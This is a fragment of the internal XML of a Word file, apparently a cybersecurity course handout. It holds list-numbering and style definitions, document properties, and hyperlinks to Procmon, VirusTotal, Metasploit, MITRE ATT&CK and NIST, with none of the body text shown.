    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74C8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E1767F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A8A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5055E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F52A1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701F95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF78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C237F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E3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AE5AE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2484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111D88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E7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603722"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A742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A97234"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD4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E2CBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48F41D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6830A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60ECC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38C2CA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADFA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F2736A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3C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1E6682"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9430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E81ACC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="818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B2D71B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BA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BDF1084"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753C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E02FB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06FA0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5B3F87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B16A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EF736C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A98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41531C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6220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585B1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D8CF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AF90268"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4B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FD2045"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E0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5A70DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A1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951E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CA4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5C5515"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C18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F84D02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26AE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F0A780C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FEE5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F4E3548"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7BC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11119">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1849903562">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="712117253">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="930622530">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1828402279">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="181358677">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1865365043">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="641232606">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1457522869">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1394965101">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1154418438">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1200703651">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1652521698">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="892737929">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="551236031">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1466969812">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2035690255">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1901746938">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1572932117">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1574699025">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="650141834">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="688607044">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1215389175">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1192913739">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1585382807">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="564611338">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="442268079">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1236280398">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="223374598">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="903953355">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1457528834">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="256863293">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1579359656">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="952177676">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="953902062">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="525562412">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="439226869">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="690306153">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="313073539">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="2012680698">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1594195388">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1277056760">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="2105572289">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="300504923">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="922686064">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1062874196">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="590158590">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="88090226">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1630552588">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1428036113">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="186676295">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="144858757">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="929630420">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1873498320">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="480267121">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1162311572">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1757095218">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="1331785961">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="78865975">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1627271721">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1336693122">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1816600916">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1955403431">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1557819923">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="2070763221">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="318265787">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1608463181">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="1339576763">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="354960998">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="1127747046">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="31072067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87"/>
    <w:rsid w:val="001C7624"/>
    <w:rsid w:val="002F5AD6"/>
    <w:rsid w:val="00362440"/>
    <w:rsid w:val="00676A80"/>
    <w:rsid w:val="007655D5"/>
    <w:rsid w:val="009A3E44"/>
    <w:rsid w:val="00B26176"/>
    <w:rsid w:val="00C34A87"/>
    <w:rsid w:val="00FF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ECA90"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1F61635F-5C84-6A48-B96A-0B7F8DFDE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4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4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A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C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34A87"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-normal">
    <w:name w:val="whitespace-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C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C34A8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4A87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34A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4A8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4A8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34A87"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="task-list-item">
    <w:name w:val="task-list-item"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C3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sysinternals/downloads/procmon" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov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rustotal.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/ddo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instructor@mmu.edu.m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en-us/sysinternals/downloads/procmon" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.virustotal.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.metasploi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ttack.mitre.org" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/home/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23</Pages>
  <Words>3610</Words>
  <Characters>20577</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>171</Lines>
  <Paragraphs>48</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24139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Hafiz Adnan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hussain Hafiz Adnan</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-19T22:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T00:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>